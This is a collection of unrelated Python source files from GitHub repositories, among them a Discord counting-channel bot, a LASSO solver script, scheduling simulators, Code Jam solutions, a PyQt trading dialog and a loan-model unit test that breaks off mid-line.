+{"seq_id":"27830515633","text":"\"\"\" The counting channel specific commands of the discord bot. \"\"\"\nfrom discord.ext import commands\nimport re\n\n\nclass Counting(commands.Cog):\n \"\"\" The counting channel specific commands of the bot. \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n @commands.has_permissions(administrator=True)\n async def recount(self, ctx: commands.Context, *args):\n \"\"\" Recounts counting-channel, skipping first arg[0] numbers.\\n\n Syntax:\n - ?recount [start_from | 0] [delete_after | None]\n \"\"\"\n\n # Only checks messages in counting-channel\n if ctx.channel.id != 699762298721665158:\n return\n\n await ctx.message.delete()\n\n # Initialise variables\n start_from = None\n limited = False\n previous_message = \"0 0\"\n count = 0\n delete_after = None\n\n if len(args) > 0:\n start_from = int(args[0])\n limited = True\n\n if len(args) > 1:\n delete_after = int(args[1])\n\n # Iterate over list of all messages in counting-channel\n async for m in ctx.channel.history(limit=None, oldest_first=True):\n\n if limited:\n count += 1\n limited = count < start_from\n\n if not limited:\n pre = previous_message.replace(\"(\", \" \").split(\" \")[0].strip()\n pre = re.sub(\"[^0-9]\", \"\", pre)\n message_content = m.content\n\n try:\n if not message_content.startswith(str(int(pre)+1)):\n print(\"Bad count:\", int(previous_message.split(\" \")[0]), int(m.content.split(\" \")[0]))\n await ctx.channel.send(m.jump_url, delete_after=delete_after)\n except ValueError:\n pass\n\n previous_message = message_content\n\n @commands.Cog.listener()\n async def on_message(self, message):\n \"\"\" Counting channel check listener. \"\"\"\n\n # Ignore messages from the bot\n if message.author == self.bot.user:\n return\n\n # Only checks messages in counting-channel\n if message.channel.id != 699762298721665158:\n return\n\n # gets the last 2 messages\n messages = await message.channel.history(limit=2).flatten()\n\n # Process the older message\n pre = messages[1].content.replace(\"(\", \" \").split(\" \")[0].strip()\n pre = re.sub(\"[^0-9]\", \" \", pre)\n\n # Process the current message\n message_content = messages[0].content\n\n # Delete the current message if the number is wrong\n if not message_content.startswith(str(int(pre)+1)):\n await message.channel.send(\"Check yourself before you wreck yourself.\", delete_after=3)\n await message.delete()\n","repo_name":"Hippodoodle/Nidhogg-Bot","sub_path":"cogs/counting.py","file_name":"counting.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39541487124","text":"import os.path\nimport numpy as np\nfrom numpy import linalg as la\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.append('..')\nimport invprob.sparse as sparse\nfrom invprob.optim import fb_lasso\n\n#########################################\n# This is for production only\nimport importlib\nimportlib.reload(sparse)\nimportlib.reload(fb)\n#########################################\n\nnp.random.seed(seed=78) # Seed for np.random\ndpi = 100 # Resolution for plotting (230 for small screen, 100 for large one)\nplt.ion()\nfolder = \"scripts/../output/L1_reg/\"\n\n# We start by defining the characteristics of the problem\ndata_size = 100\ndata_number = round(data_size / 2)\nsparsity_level = 10\nnoise_level = 1e-2 * 0\n\n# We define the main components of our problem\nPhi = np.random.randn(data_number, data_size)\nx0 = np.sign(sparse.randn(data_size, 1, sparsity_level))\nnoise = noise_level * np.random.randn(data_number, 1)\ny = Phi@x0 + noise\n\n# Let's compare the ground truth with the pseudo inverse solution\nx_pinv = la.lstsq(Phi, y, rcond=None)[0]\n_ = plt.figure(dpi=dpi)\nsparse.stem(x0, \"C0\", \"ground truth\")\nsparse.stem(x_pinv, \"C1\", \"pinv solution\")\nplt.show()\n\n# Let's compare the ground truth with the solution of the LASSO\n# (computed with the Forward-Backward algorithm)\nreg_param = 0.01\niter_nb = 40000\n\nx_reg = fb_lasso(Phi, y, reg_param, iter_nb)\n_ = plt.figure(dpi=dpi)\nsparse.stem(x0, \"C0\", \"ground truth\")\nsparse.stem(x_reg, \"C1\", \"reg solution\")\nplt.show()\n\n# We look at what happens during the iterations of the algorithm\nx_reg, details = fb_lasso(Phi, y, reg_param, iter_nb, verbose=True)\nplt.figure(dpi=dpi)\nplt.title(r\"Evolution of $f(x_n)$\")\nplt.plot(details.get(\"function_value\"))\nplt.figure(dpi=dpi)\nplt.title(r\"Evolution of supp$(x_n)$\")\nplt.plot(details.get(\"iterate_support\"))\nplt.show()\n\n# Now we generate the regularization path\n# Quite expensive in time depending on the parameters!\ndef compute_reg_path(Phi, y, reg_param_grid):\n print(\"Computing the regularization path\")\n reg_path = np.empty((Phi.shape[1], 0), int)\n x_ini = np.zeros((Phi.shape[1], 1))\n for reg_param in reg_param_grid:\n ''' We choose the number of iterations to do depending on the reg_param.\n This is a completely custom choice, it seems to work quite well\n on random problems.\n '''\n if reg_param < 0.1:\n iter_nb = 40000\n elif reg_param < 1:\n iter_nb = 4000\n elif reg_param < 10:\n iter_nb = 1000\n else:\n iter_nb = 200\n # We use a warm restart approach:\n # for each problem we use the solution of the previous problem\n # as a starting point\n x_reg = fb_lasso(Phi, y, reg_param, iter_nb, x_ini=x_ini)\n x_ini = x_reg\n reg_path = np.concatenate((reg_path, x_reg), axis=1)\n return reg_path\n\nregp_min = -2\nregp_max = 2\nregp_number = 200\nreg_param_grid = np.round(np.logspace(regp_min, regp_max, regp_number), 3)[::-1]\n\nif os.path.isfile(folder + 'reg_path_noiseless.npy'):\n reg_path = np.load(folder + 'reg_path_noiseless.npy')\n if reg_path.shape[1] != regp_number: # Previous but different experiment\n reg_path = compute_reg_path(Phi, y, reg_param_grid)\n np.save(folder + 'reg_path_noiseless.npy', reg_path)\nelse:\n reg_path = compute_reg_path(Phi, y, reg_param_grid)\n np.save(folder + 'reg_path_noiseless.npy', reg_path)\n\n# We save the reg path as many image files and as an animated gif\n# This is the name under which we save the data\nfile_name = folder + 'reg_path_noiseless'\n# We concatenate conveniently x0 and reg_path in such a way that for every frame\n# we plot two signals: x0 and reg_path[param]\npaths = np.stack((np.repeat(x0, regp_number, axis=1), reg_path),\n axis=2)\n# We chose a title for every frame we'll plot\ntitle_grid = [r\"Ground truth $x_0$ vs regularised solution $x_\\lambda$ \" +\n \"for $\\lambda$=\" + str(param) for param in reg_param_grid]\n\nplt.ioff()\nplt.figure(dpi=dpi)\noptions = {\"animation\": False, # What we wanna save and how\n \"frames\": False,\n \"interval\": 100,\n \"file_name\": file_name}\nsparse.save_stem_gif(paths, reg_param_grid, title_grid, options)\n","repo_name":"Guillaume-Garrigos/invprob","sub_path":"scripts/lasso_1-regularisation_path.py","file_name":"lasso_1-regularisation_path.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"15845104959","text":"#!/usr/bin/python\nimport aud, math, time\nlength = 0.5\nfadelength = 0.05\n\ndevice = aud.Device()\nhigh = aud.Sound.sine(880).limit(0, length).fadein(0, fadelength).fadeout(length - fadelength, length)\nlow = aud.Sound.sine(700).limit(0, length).fadein(0, fadelength).fadeout(length - fadelength, length).volume(0.6)\nsound = high.join(low)\nhandle = device.play(sound)\nhandle.loop_count = -1\n\nstart = time.time()\n\nwhile time.time() - start < 10:\n\tangle = time.time() - start\n\n\thandle.location = [math.sin(angle), 0, -math.cos(angle)]\n\n","repo_name":"blender/blender","sub_path":"extern/audaspace/bindings/python/examples/siren.py","file_name":"siren.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"}
+{"seq_id":"23548576381","text":"# -*- coding: utf-8 -*-\n# @Author: Patrice Béchard 20019173\n# @Date: 2017-04-07 20:35:46\n# @Last Modified time: 2017-04-07 21:00:03\n#\n# A. Oversized Pancake Flipper\n#\n\ndef flip_pancakes(pancakes,j,sz):\n\tfor k in range(sz):\n\t\tpancakes[j+k] = not pancakes[j+k]\n\treturn pancakes\n\nfile = 'A-large.in'\nfile2 = 'output2.txt'\nf = open(file)\ng = open(file2,'w')\nnumber = int(f.readline().strip())\n\nfor i in range(number):\n\ttemp = f.readline().strip().split()\n\tsizeFlipper = int(temp[1])\n\tpancakes = []\t\t\t\t\t\t\t#bool array\n\tnFlip = 0\n\tfor char in temp[0]:\n\t\tif char == \"+\":\n\t\t\tpancakes.append(True)\n\t\telse:\n\t\t\tpancakes.append(False)\n\tfor j in range(len(pancakes)):\n\t\tif j + sizeFlipper > len(pancakes):\n\t\t\tif False in pancakes:\n\t\t\t\tnFlip = \"IMPOSSIBLE\"\n\t\t\t\tbreak\n\t\tif pancakes[j] is False:\n\t\t\tflip_pancakes(pancakes,j,sizeFlipper)\t#will now be true\n\t\t\tnFlip += 1\n\tnFlip = str(nFlip)\n\tout = 'Case #%d: %s\\n'%(i+1,nFlip)\n\tg.write(out)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/558.py","file_name":"558.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14199771776","text":"import queue\r\nimport os\r\n\r\n# Ruta completa del archivo \"procesos.txt\"\r\nruta_archivo = r'D:\\Practica 3\\procesos.txt'\r\n\r\n# Verifica si el archivo existe en la ruta especificada\r\nif not os.path.isfile(ruta_archivo):\r\n print(\"El archivo 'procesos.txt' no se encuentra en la ubicación especificada.\")\r\n exit()\r\n\r\n# Función para agregar un nuevo proceso al archivo\r\ndef agregar_proceso():\r\n nombre = input(\"Nombre del proceso: \")\r\n\r\n # Validación del tiempo como número entero\r\n while True:\r\n tiempo = input(\"Tiempo del proceso (entero): \")\r\n if tiempo.isdigit():\r\n break\r\n else:\r\n print(\"El tiempo debe ser un número entero.\")\r\n\r\n # Validación de la prioridad como número entero\r\n while True:\r\n prioridad = input(\"Prioridad del proceso (entero): \")\r\n if prioridad.isdigit():\r\n break\r\n else:\r\n print(\"La prioridad debe ser un número entero.\")\r\n\r\n posicion = input(\"¿Deseas agregar al principio o al final? (P = Principio, F = Final): \").strip().lower()\r\n\r\n if posicion == 'p':\r\n # Insertar al principio del archivo\r\n with open(ruta_archivo, \"r\") as file:\r\n procesos = [line.strip() for line in file.readlines()]\r\n with open(ruta_archivo, \"w\") as file:\r\n file.write(f\"{nombre}, {tiempo}, {prioridad}\\n\")\r\n for proceso in procesos:\r\n file.write(proceso + \"\\n\")\r\n else:\r\n # Agregar al final del archivo\r\n with open(ruta_archivo, \"a\") as file:\r\n file.write(f\"{nombre}, {tiempo}, {prioridad}\\n\")\r\n\r\n# Función para cargar los procesos desde el archivo y crear las colas\r\ndef cargar_procesos_y_colas():\r\n with open(ruta_archivo, \"r\") as file:\r\n procesos = [line.strip().split(\", \") for line in file.readlines()]\r\n procesos = [(nombre, int(tiempo), int(prioridad)) for nombre, tiempo, prioridad in procesos]\r\n\r\n cola_listos_rr = queue.Queue()\r\n cola_listos_sjf = []\r\n cola_listos_fifo = queue.Queue()\r\n cola_listos_prioridades = queue.PriorityQueue()\r\n\r\n for proceso in procesos:\r\n cola_listos_rr.put(proceso)\r\n cola_listos_sjf.append(proceso)\r\n cola_listos_fifo.put(proceso)\r\n cola_listos_prioridades.put((proceso[2], proceso))\r\n\r\n return procesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades\r\n\r\n# Crear colas (queues) y cargar los procesos al inicio\r\nprocesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades = cargar_procesos_y_colas()\r\n\r\ndef simular_round_robin():\r\n lapso_rr = 3 # Cambia este valor según tus necesidades\r\n tiempo_total_rr = 0\r\n\r\n print(\"Simulación de Round Robin:\")\r\n while not cola_listos_rr.empty():\r\n proceso_actual = cola_listos_rr.get()\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n \r\n # Verifica si el tiempo restante es mayor que cero antes de ejecutar el proceso\r\n if tiempo_restante > 0:\r\n ejecucion = min(lapso_rr, tiempo_restante)\r\n tiempo_total_rr += ejecucion\r\n tiempo_restante -= ejecucion\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en Round Robin\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_rr}\")\r\n\r\n if tiempo_restante > 0:\r\n # Si el proceso aún tiene tiempo restante, vuelve a agregarlo a la cola de listos\r\n cola_listos_rr.put((nombre, tiempo_restante, prioridad))\r\n\r\ndef simular_sjf():\r\n cola_listos_sjf.sort(key=lambda x: x[1]) # Ordena la cola por tiempo de ejecución\r\n tiempo_total_sjf = 0\r\n\r\n print(\"\\nSimulación de Shortest Job First:\")\r\n while cola_listos_sjf:\r\n proceso_actual = cola_listos_sjf.pop(0)\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n tiempo_total_sjf += tiempo_restante\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en SJF\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_sjf}\")\r\n\r\ndef simular_fifo():\r\n tiempo_total_fifo = 0\r\n\r\n print(\"\\nSimulación de First In, First Out:\")\r\n while not cola_listos_fifo.empty():\r\n proceso_actual = cola_listos_fifo.get()\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n tiempo_total_fifo += tiempo_restante\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en FIFO\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_fifo}\")\r\n\r\ndef simular_prioridades():\r\n tiempo_total_prioridades = 0\r\n\r\n print(\"\\nSimulación de Prioridades:\")\r\n while not cola_listos_prioridades.empty():\r\n proceso_actual = cola_listos_prioridades.get()[1] # Obtiene el proceso de la cola\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n tiempo_total_prioridades += tiempo_restante\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en Prioridades\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_prioridades}\")\r\n\r\nwhile True:\r\n print(\"\\nSelecciona una opción:\")\r\n print(\"1. Simular Round Robin\")\r\n print(\"2. Simular Shortest Job First (SJF)\")\r\n print(\"3. Simular First In, First Out (FIFO)\")\r\n print(\"4. Simular Prioridades\")\r\n print(\"5. Realizar todas las simulaciones\")\r\n print(\"6. Agregar un nuevo proceso\")\r\n print(\"7. Salir\")\r\n \r\n opcion = input(\"Elije una opción: \")\r\n\r\n if opcion == \"1\":\r\n procesos, cola_listos_rr, _, _, _ = cargar_procesos_y_colas()\r\n simular_round_robin()\r\n elif opcion == \"2\":\r\n procesos, _, cola_listos_sjf, _, _ = cargar_procesos_y_colas()\r\n simular_sjf()\r\n elif opcion == \"3\":\r\n procesos, _, _, cola_listos_fifo, _ = cargar_procesos_y_colas()\r\n simular_fifo()\r\n elif opcion == \"4\":\r\n procesos, _, _, _, cola_listos_prioridades = cargar_procesos_y_colas()\r\n simular_prioridades()\r\n elif opcion == \"5\":\r\n procesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades = cargar_procesos_y_colas()\r\n simular_round_robin()\r\n simular_sjf()\r\n simular_fifo()\r\n simular_prioridades()\r\n elif opcion == \"6\":\r\n agregar_proceso()\r\n procesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades = cargar_procesos_y_colas()\r\n elif opcion == \"7\":\r\n break\r\n else:\r\n print(\"Opción no válida. Por favor, elige una opción válida (1-7).\")\r\n\r\nprint(\"\\nTodos los procesos han terminado.\")\r\n","repo_name":"jonathan00909/Semianrio_Sistemas_Operativos","sub_path":"Practicas/Practica 4/Practica 4.py","file_name":"Practica 4.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23510682351","text":"def func(N, J):\r\n produced = 0\r\n stringNumber = 0\r\n\r\n while produced < J:\r\n noPrime = True\r\n dividers = []\r\n\r\n string = '1' + bin(stringNumber)[2:].zfill(N-2) + '1'\r\n\r\n for base in range(2, 11):\r\n if isPrime(convertBase(string, base), dividers):\r\n noPrime = False\r\n break\r\n\r\n if noPrime:\r\n print(string + ' ' + ' '.join(str(div) for div in dividers))\r\n produced += 1\r\n\r\n stringNumber += 1\r\n\r\n\r\ndef isPrime(n, dividers):\r\n # See https://en.wikipedia.org/wiki/Primality_test#Pseudocode\r\n\r\n if n <= 1:\r\n return False\r\n if n <= 3:\r\n return True\r\n if n % 2 == 0:\r\n dividers.append(2)\r\n return False\r\n if n % 3 == 0:\r\n dividers.append(3)\r\n return False\r\n\r\n i = 5\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n dividers.append(i)\r\n return False\r\n if n % (i + 2) == 0:\r\n dividers.append(i+2)\r\n return False\r\n i += 6\r\n\r\n return True\r\n\r\n\r\ndef convertBase(string, base):\r\n number = 0\r\n\r\n for i in range(len(string)):\r\n number += int(string[i]) * (base ** (len(string) - i - 1))\r\n\r\n return number\r\n\r\nT = int(input())\r\n\r\nN, J = input().split(' ')\r\nprint('Case #' + str(T) + ':')\r\nfunc(int(N), int(J))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/3554.py","file_name":"3554.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13555105209","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#tradeDialogWindow.py\nimport copy, numpy as np\nfrom PyQt4 import QtGui, QtCore, uic\n\nclass QTradeDialogWindow(QtGui.QDialog):\n\tdef __init__(self, QMain, pairKey, pairPara, tradePoint):\n\t\tsuper(QTradeDialogWindow,self).__init__(parent = QMain)\n\t\tself.QMain = QMain\n\t\tself.pairKey, self.pairPara, self.tradePoint = pairKey, pairPara, tradePoint\n\t\tself.initUI()\n\t\tself.initEventConnection()\n\t\ttimer = QtCore.QTimer(self)\n\t\ttimer.setInterval(1000)\n\t\tQtCore.QObject.connect(timer, QtCore.SIGNAL(\"timeout()\"), self.updateVol)\n\t\ttimer.start()\n\t#初始化窗口布局\n\tdef initUI(self):\n\t\tuic.loadUi('ui/tradeDialog.ui', self)\n\t\tself.setWindowTitle(u'记录开平仓')\n\t\tself.initTable()\n\t\tself.initPara()\n\tdef initTable(self):\n\t\t#stock_A_10档行情\n\t\tself.stock_A_tableWidget.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\n\t\tself.stock_A_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\t#设置选择行为,以行为单位\n\t\tself.stock_A_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\t\t#禁止编辑\n\t\t#stock_B_10档行情\n\t\tself.stock_B_tableWidget.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\n\t\tself.stock_B_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\t#设置选择行为,以行为单位\n\t\tself.stock_B_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\t\t#禁止编辑\n\t\t#初始空值\n\t\tfor i in range(10):\n\t\t\tfor j in range(2):\n\t\t\t\tnewItem1 = QtGui.QTableWidgetItem(\"\")\n\t\t\t\tself.stock_A_tableWidget.setItem(i,j,newItem1)\n\t\t\t\tnewItem2 = QtGui.QTableWidgetItem(\"\")\n\t\t\t\tself.stock_B_tableWidget.setItem(i,j,newItem2)\n\t\t\t\tif not j:\n\t\t\t\t\tif i <= 4:\n\t\t\t\t\t\tnewItem1.setForeground(QtGui.QColor(\"red\"))\n\t\t\t\t\t\tnewItem2.setForeground(QtGui.QColor(\"red\"))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewItem1.setForeground(QtGui.QColor(\"green\"))\n\t\t\t\t\t\tnewItem2.setForeground(QtGui.QColor(\"green\"))\n\t\t\t\tif i == 4:\n\t\t\t\t\tnewItem1.setBackground(QtGui.QColor(226,244,235,100))\n\t\t\t\t\tnewItem2.setBackground(QtGui.QColor(226,244,235,100))\n\t\t\t\tif i == 5:\n\t\t\t\t\tnewItem1.setBackground(QtGui.QColor(252,221,222,100))\n\t\t\t\t\tnewItem2.setBackground(QtGui.QColor(252,221,222,100))\n\t#初始化窗口元件事件关联\n\tdef initEventConnection(self):\n\t\t#计算配对系数\n\t\tself.stock_A_Price_doubleSpinBox.valueChanged.connect(self.getPairValue)\n\t\tself.stock_B_Price_doubleSpinBox.valueChanged.connect(self.getPairValue)\n\t\t#打开交易对话框\n\t\tself.stock_A_tableWidget.cellDoubleClicked.connect(self.updatePriceA)\n\t\tself.stock_B_tableWidget.cellDoubleClicked.connect(self.updatePriceB)\n\t\t#对话提交\n\t\tself.buttonBox.accepted.connect(self.accept) # 确定\n\t\tself.buttonBox.rejected.connect(self.reject) # 取消\n\tdef initPara(self):\n\t\tself.pairKey_label.setText(self.pairKey)\n\t\tself.trade_Type_label.setText(self.tradePoint[\"type\"])\n\t\tself.dealTime_dateTimeEdit.setDateTime(self.tradePoint[\"dateTime\"])\n\n\t\tself.stock_A_List_label.setText(self.tradePoint[\"stock_A\"])\n\t\tself.stock_A_label.setText(self.tradePoint[\"stock_A\"])\n\t\tself.stock_A_Direction_label.setText(self.tradePoint[\"dirc_A\"])\n\t\tself.stock_A_Price_doubleSpinBox.setValue(self.tradePoint[\"pa\"])\n\t\tself.stock_A_Price_doubleSpinBox.setSingleStep(0.01)\n\t\tself.stock_A_Vol_spinBox.setSingleStep(100)\n\t\tself.stock_A_Vol_spinBox.setRange(100,1000)\n\n\t\tself.stock_B_List_label.setText(self.tradePoint[\"stock_B\"])\n\t\tself.stock_B_label.setText(self.tradePoint[\"stock_B\"])\n\t\tself.stock_B_Direction_label.setText(self.tradePoint[\"dirc_B\"])\n\t\tself.stock_B_Price_doubleSpinBox.setValue(self.tradePoint[\"pb\"])\n\t\tself.stock_B_Price_doubleSpinBox.setSingleStep(0.01)\n\t\tself.stock_B_Vol_spinBox.setSingleStep(100)\n\t\tself.stock_B_Vol_spinBox.setRange(100,1000)\n\t\t#获得量\n\t\tif self.tradePoint[\"type\"] == \"open\":\n\t\t\tself.stock_A_Vol_spinBox.setValue(self.tradePoint[\"vol_a\"])\n\t\t\tself.stock_B_Vol_spinBox.setValue(self.tradePoint[\"vol_b\"])\n\t\telse:\n\t\t\ttry:\n\t\t\t\topenPoint = self.QMain.positionsPair[self.pairKey][-1]\n\t\t\t\tself.stock_A_Vol_spinBox.setValue(openPoint[\"vol_a\"])\n\t\t\t\tself.stock_B_Vol_spinBox.setValue(openPoint[\"vol_b\"])\n\t\t\texcept Exception:\n\t\t\t\tpass\t\t\t\n\t\t#计算配对系数\n\t\tself.getPairValue(0)\n\t\t#设置阈值\n\t\tself.open_label.setText(str(self.pairPara[\"open\"]))\n\t\tself.close_label.setText(str(self.pairPara[\"close\"]))\n\t\tself.stop_label.setText(str(self.pairPara[\"stop\"]))\n\t#计算配对系数\n\tdef getPairValue(self,value):\n\t\tSt = np.log(self.stock_A_Price_doubleSpinBox.value()) - self.pairPara[\"beta\"]*np.log(self.stock_B_Price_doubleSpinBox.value())\n\t\tS = (St - self.pairPara[\"mean\"])/self.pairPara[\"std\"]\n\t\tself.pair_Value_label.setText(str(S))\n\t#获得单数据\n\tdef updateVol(self):\n\t\tvolList_A = self.QMain.pairTradeStatus[self.pairKey][\"volList_A\"]\n\t\tvolList_B = self.QMain.pairTradeStatus[self.pairKey][\"volList_B\"]\n\t\tfor i in xrange(10):\n\t\t\tfor j in xrange(2):\n\t\t\t\tself.stock_A_tableWidget.item(i,j).setText(str(volList_A[i][j]))\n\t\t\t\tself.stock_B_tableWidget.item(i,j).setText(str(volList_B[i][j]))\n\t#更新保单价格\n\tdef updatePriceA(self, row, column):\n\t\tnewPrice = self.stock_A_tableWidget.item(row, 0).text()\n\t\tself.stock_A_Price_doubleSpinBox.setValue(float(newPrice))\n\tdef updatePriceB(self, row, column):\n\t\tnewPrice = self.stock_B_tableWidget.item(row, 0).text()\n\t\tself.stock_B_Price_doubleSpinBox.setValue(float(newPrice))\n\t#得到真实交易点\n\tdef getTrueTradePoint(self):\n\t\ttradePoint = copy.copy(self.tradePoint)\n\t\ttradePoint[\"dateTime\"] = self.dealTime_dateTimeEdit.dateTime().toPyDateTime()\n\t\ttradePoint[\"pa\"] = self.stock_A_Price_doubleSpinBox.value()\n\t\ttradePoint[\"vol_a\"] = self.stock_A_Vol_spinBox.value()\n\t\ttradePoint[\"pb\"] = self.stock_B_Price_doubleSpinBox.value()\n\t\ttradePoint[\"vol_b\"] = self.stock_B_Vol_spinBox.value()\n\t\treturn tradePoint","repo_name":"sharmaking/CoIntegrationAnalysis","sub_path":"tradeDialogWindow.py","file_name":"tradeDialogWindow.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28485277775","text":"import json\nfrom typing import List\n\nfrom sql_storage import EventRepository\nfrom models import group_by_dates, Event\nfrom duplicate_detector import DuplicateEventsRemover\n\n\ndef load_events(folder) -> List[Event]:\n with open(\"%s\\\\events.json\" % folder, \"r\", encoding=\"utf-8\") as f:\n events = json.load(f)\n events = [Event.from_json(e) for e in events]\n return events\n\n\ndef save_to_storage(folder):\n repository = EventRepository()\n duplicate_remover = DuplicateEventsRemover()\n events = load_events(folder)\n events_by_date = group_by_dates(events)\n\n for date, events in events_by_date.items():\n events_to_save = []\n ids_to_remove = []\n existing_events = list(repository.list_events_by_date(date))\n duplicate_list = duplicate_remover.detect_duplicates(existing_events + events)\n for duplicates in duplicate_list:\n if len(duplicates) == 1:\n unique_event = duplicates[0]\n else:\n if any([not e.timestamp for e in duplicates]):\n unique_event = max(duplicates, key=lambda e: len(e.to_str()))\n else:\n unique_event = max(duplicates, key=lambda e: e.timestamp)\n\n duplicates = [d for d in duplicates if d != unique_event]\n ids_to_remove.extend([e.event_id for e in duplicates if e.event_id])\n\n if not unique_event.event_id:\n events_to_save.append(unique_event)\n repository.save_events(events_to_save)\n repository.remove_events(ids_to_remove)\n\n\nif __name__ == \"__main__\":\n save_to_storage(\"C:\\\\Projects\\\\Research\\\\Events\\\\data\\\\event_data\\\\raw_data\\\\2020_5_29\")\n","repo_name":"creeston/Events","sub_path":"scripts/save_to_storage.py","file_name":"save_to_storage.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13168953147","text":"from hamcrest import equal_to, assert_that, instance_of\n\nfrom app.common.util import safe_get, get_custom_value\nfrom app.consorsfinanz.flows.submit.models.vorgang_marktplatz_model import VorgangMarktplatzModel, Stammdaten, \\\n FamilienstandEnum, Kind, BeschaeftigungsartEnum, Bonitaetsangaben, MietAusgaben, WohnartEnum, AnredeEnum, \\\n TitleEnum, Unterhaltsverpflichtungen, PartnerCustom, Custom, Immobilie, Darlehen\n\n\ndef test_get_custom_value():\n partner_custom_list = [\n Custom(key=\"zeitpunktKontoeroeffnungAs1\", value=\"2014-10-20T13:14:07.712+02:00\"),\n Custom(key=\"finanzierungszweckBeschreibung\", value=\"AMA\"),\n Custom(key=\"datenweitergabe\", value=None)\n ]\n\n assert_that(get_custom_value(partner_custom_list, \"zeitpunktKontoeroeffnungAs1\"),\n equal_to(\"2014-10-20T13:14:07.712+02:00\"))\n\n assert_that(get_custom_value(partner_custom_list, \"finanzierungszweckBeschreibung\"), equal_to(\"AMA\"))\n\n assert_that(get_custom_value(partner_custom_list, \"datenweitergabe\"), equal_to(None))\n\n\ndef test_get_custom_value_empty_list():\n partner_custom_list = []\n\n assert_that(get_custom_value(partner_custom_list, \"zeitpunktKontoeroeffnungAs1\"), equal_to(None))\n\n\ndef test_safe_get():\n # GIVEN\n vorgang = VorgangMarktplatzModel(\n partner=PartnerCustom(custom=[\n Custom(key=\"finanzierungszweckBeschreibungAs1\", value=\"AMA\")\n ]),\n stammdaten=Stammdaten(\n anredeAs1=AnredeEnum.HERR,\n titelAs1=[TitleEnum.DOKTOR],\n vornameAs1=\"Hans\",\n nachnameAs1=\"Dampf\",\n emailAs1=\"jean-marc.nadal@consorsfinanz.de\",\n strasseAs1=\"Fraunbergstr 18\",\n plzAs1=\"81379\",\n ortAs1=\"Bonn\",\n wohnhaftSeitAs1=\"2014-10-20T13:14:07.712+02:00\",\n telefonPrivatAs1=\"089832432432\",\n geburtsnameAs1=\"foo\",\n geburtsdatumAs1=\"1980-12-11T13:14:07.712+02:00\",\n staatsangehoerigkeitAs1=\"DE\",\n geburtslandAs1=\"DE\",\n wohnartAs1=WohnartEnum.IM_EIGENEN_HAUS,\n familienstandAs1=FamilienstandEnum.VERHEIRATET,\n kinder=[Kind(kindergeldFuer=\"lisa\")],\n iban=\"DE89370400440532013000\",\n einkommenMonatlichAs1=1500,\n beschaeftigungsartAs1=BeschaeftigungsartEnum.ANGESTELLTER,\n beschaeftigtSeitAs1=\"2014-10-20T13:14:07.712+02:00\",\n arbeitgeberNameAs1=\"Siemens GmbH\",\n arbeitgeberStrasseAs1=\"Hansastr. 11\",\n arbeitgeberPlzAs1=\"80339\",\n arbeitgeberOrtAs1=\"Muenchen\",\n voranschriftStrasseAs1=\"Barstr 12\",\n voranschriftPlzAs1=\"10713\",\n voranschriftOrtAs1=\"Berlin\",\n immobilien=[Immobilie(\n darlehen=[Darlehen(\n rateMonatlich=100\n )]\n )]\n ),\n bonitaetsangaben=Bonitaetsangaben(\n mietausgaben=[MietAusgaben(\n betragMonatlich=\"1\",\n zugehoerigkeit=\"as1\"\n )],\n unterhaltsverpflichtungen=[Unterhaltsverpflichtungen(\n zugehoerigkeit=\"as1\"\n )],\n ehegattenunterhalt=[]\n )\n )\n\n foo_bar = 